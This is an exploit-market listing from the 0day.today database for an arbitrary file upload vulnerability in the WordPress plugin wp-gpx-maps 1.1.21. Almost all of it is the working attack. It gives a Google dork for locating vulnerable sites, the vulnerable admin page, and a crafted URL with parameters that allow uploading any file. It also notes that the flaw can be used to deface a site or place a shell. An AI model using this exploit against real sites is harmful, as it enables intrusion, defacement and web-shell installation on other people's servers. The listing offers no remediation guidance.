[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress wp-gpx-map version 1.1.21 Arbitrary File Upload Vulnerability

Author
Adrien Thierry
Risk
[
Security Risk High
]
0day-ID
0day-ID-18561
Category
web applications
Date add
11-06-2012
Platform
php
###########################################################
#
# Exploit Title: Wordpress wp-gpx-map version 1.1.21 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/wp-gpx-maps/
# Date: 11/05/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.darwinner.it/
# Software Link: http://downloads.wordpress.org/plugin/wp-gpx-maps.1.1.21.zip
# Version: 1.1.21
#
###########################################################
 
Vuln page : http://mysite.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php
 
exploit :
 
Go to url :
 
http://my-site.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=//
 
And you can upload what you want. You could change file path with target_path (deface, shell etc...)
 
#####################################################################



#  0day.today [2024-07-02]  #